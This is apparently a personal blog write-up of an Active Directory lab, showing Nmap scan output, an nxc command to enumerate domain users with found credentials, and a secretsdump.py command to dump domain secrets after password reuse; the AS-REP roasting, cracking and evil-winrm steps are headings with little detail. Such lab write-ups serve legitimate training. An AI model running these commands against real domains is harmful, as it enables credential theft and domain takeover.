Hey hackers!

Hope you’re all doing great and staying curious. Lately, I’ve been spending a lot of time diving into Active Directory. If you’re working in the corporate world, you know AD is basically the heart of the network which also makes it the biggest target.

I’ve been solving another AD lab to sharpen my skills, and I wanted to share a writeup of one I just finished. It was a great reminder of how a few small misconfigurations can lead to a total compromise.

1. Host Configuration

Before jumping into the tools, I updated my /etc/hosts file. This ensures that when we call the Domain Controller or the domain itself, our system knows exactly where to route the traffic.

Open the file with sudo: sudo nano /etc/hosts

And add the following entry (after basic recon i found these):

machine-ip dc01.dry.martini.bars dc01 dry.martini.bars

Once that’s saved, we can start interacting with the dry.martini.bars domain using its proper hostnames.

2. Initial Reconnaissance

# Nmap 7.94SVN scan initiated Fri May 15 00:48:42 2026 as: /usr/lib/nmap/nmap -vvv -p 53,88,139,135,389,445,464,593,636,3269,3268,3389,5985,9389,49664,49667,49668,49670,49677,49678,49698,49710,58002 -4 -sC -sV -oN maritinAD 10.1.104.32
Nmap scan report for 10.1.104.32
Host is up, received echo-reply ttl 126 (0.40s latency).
Scanned at 2026-05-15 00:48:42 EDT for 168s
PORT      STATE SERVICE            REASON          VERSION
53/tcp    open  domain             syn-ack ttl 126 Simple DNS Plus
88/tcp    open  kerberos-sec       syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-15 04:48:50Z)
135/tcp   open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap               syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?      syn-ack ttl 126
464/tcp   open  kpasswd5?          syn-ack ttl 126
593/tcp   open  ncacn_http         syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped         syn-ack ttl 126
3268/tcp  open  ldap               syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped         syn-ack ttl 126
3389/tcp  open  ssl/ms-wbt-server? syn-ack ttl 126
| ssl-cert: Subject: commonName=DC01.DRY.MARTINI.BARS
| Issuer: commonName=DC01.DRY.MARTINI.BARS
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-16T01:19:23
| Not valid after:  2026-07-18T01:19:23
| MD5:   e45f:2ccb:66e0:e93a:ce42:62b8:4f09:0850
| SHA-1: 2ffc:e1c5:3163:c9dd:cf69:e82a:b091:67a3:1324:0dc7
| -----BEGIN CERTIFICATE-----
| MIIC7jCCAdagAwIBAgIQTPVeL4Dy9LpJHK+XV9l0XTANBgkqhkiG9w0BAQsFADAg
| MR4wHAYDVQQDExVEQzAxLkRSWS5NQVJUSU5JLkJBUlMwHhcNMjYwMTE2MDExOTIz
| WhcNMjYwNzE4MDExOTIzWjAgMR4wHAYDVQQDExVEQzAxLkRSWS5NQVJUSU5JLkJB
| UlMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJ/g3psOOQlBbVnAig
| rAYTEQ8FxugvGM5s7YHuxmG/gP5Iv8bXE0vUo8XbK5ycmrnRbmFfqMM6VWNHqMHt
| J1hZj8Lrg0++mn+fAO4yoelcTIZqMp+zdXlkKZJZMUjarKz3QJPBMLJPDIbP9FZI
| j9p/UldHNLJ2IUKYk13YRq3tHwiUJcIvZYp7cGGwhCBE1j5jrNYPl2wFEFh8T52k
| zDK3AvqPF8GrMrdeMM8XfbfG4XqFksw6Th0hbLErFlwDu9wqR9gVJNwtR0Ax4UKV
| KGbFxwB/H8EQjTiRIs9V7oRp2Faimv9DhgeNcs1nx2JsJaYR0zIRdpMg+XqvWUlK
| +GMVAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDAN
| BgkqhkiG9w0BAQsFAAOCAQEAJCrr+jqxs05xpZsTgAAU0PM+kz8a7vfYPxCqGQnJ
| xq88r8WEm9czyGx5YEzF9dRhQdPJvYjXQTsyhqqi/Jo1GklBczktoSSF/BtPGh5f
| abY/WNHhSDxTvdRSXB2VTY1EuU5JOJZZF0gilntX8xw3WnWPlBVKQAIAnFU2Qtsr
| Tgb+xv6Qat3PlC6d3R/zYAGUyRCsHfz95743eZzQhouns47XUevMRAG+2BEDyeDI
| Cpw1SvP5JoRG4uC5vPcbJ1ZOzLTnZN88hdSv4ysqLY8fSZli7deTaGMm7HG6pQKe
| qJJ/d0iwa+CuGAsG4RziqAuWJ1qOdwh3AjaGd1no7kXmxQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| rdp-ntlm-info: 
|   Target_Name: DRY
|   NetBIOS_Domain_Name: DRY
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: DRY.MARTINI.BARS
|   DNS_Computer_Name: DC01.DRY.MARTINI.BARS
|   Product_Version: 10.0.26100
|_  System_Time: 2026-05-15T04:50:40+00:00
5985/tcp  open  http               syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf             syn-ack ttl 126 .NET Message Framing
49664/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49667/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49668/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49677/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49678/tcp open  ncacn_http         syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49698/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49710/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
58002/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2026-05-15T04:50:43
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 56988/tcp): CLEAN (Timeout)
|   Check 2 (port 43134/tcp): CLEAN (Timeout)
|   Check 3 (port 64645/udp): CLEAN (Timeout)
|   Check 4 (port 57066/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

A critical distinction must be made between Anonymous Logons and the Guest Account. Anonymous logons represent an unauthenticated state (Null Session) which modern operating systems strictly restrict. Conversely, the Guest account is a legitimate, built-in security principal. When left enabled with Read/Write permissions, it allows unauthenticated network actors to masquerade as local users, leading to unauthorized data exposure and a total loss of non-repudiation in security logs.

A critical finding during the passive share enumeration phase was a leaky file system setup. A readable text file, notes.txt, exposed operational habits and, crucially, an entry point:

cat notes.txt       
- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint
creds
redacted

User Enumeration

With a valid foothold established through the compromised credentials of mprice, the next step was to perform active user enumeration. Instead of blind brute-forcing, I used the authentic session to pull a definitive list of valid domain objects. The goal was to feed these usernames into an AS-REP Roasting attack.

nxc smb 10.1.104.32 -u "redacted" -p "redacted" --users | awk '{print $5}' | sed -n '4,9p' | tee users

3. AS-REP Roasting

The tool pulled a hash for an AD user . This means this account is vulnerable because it doesn't require pre-authentication.

4. Password Cracking

5. Remote Connection (EvilRM)

I leveraged evil-winrm to authenticate to the Domain Controller using the newly acquired credentials

6. Secret Dumps

The technique is known as Password Spraying or Credential Reuse. In many environments, administrators or automated setups reuse identical passwords across multiple accounts (such as a standard service account and a high-privilege admin account) to make management easier.

Because I discovered that athena.t0 shared the exact same password (redacted) as athena_svc, I was able to pivot to an account that held explicit DCSync replication rights.

secretsdump.py 'athena.t0:<redcated>@DC01.DRY.MARTINI.BARS'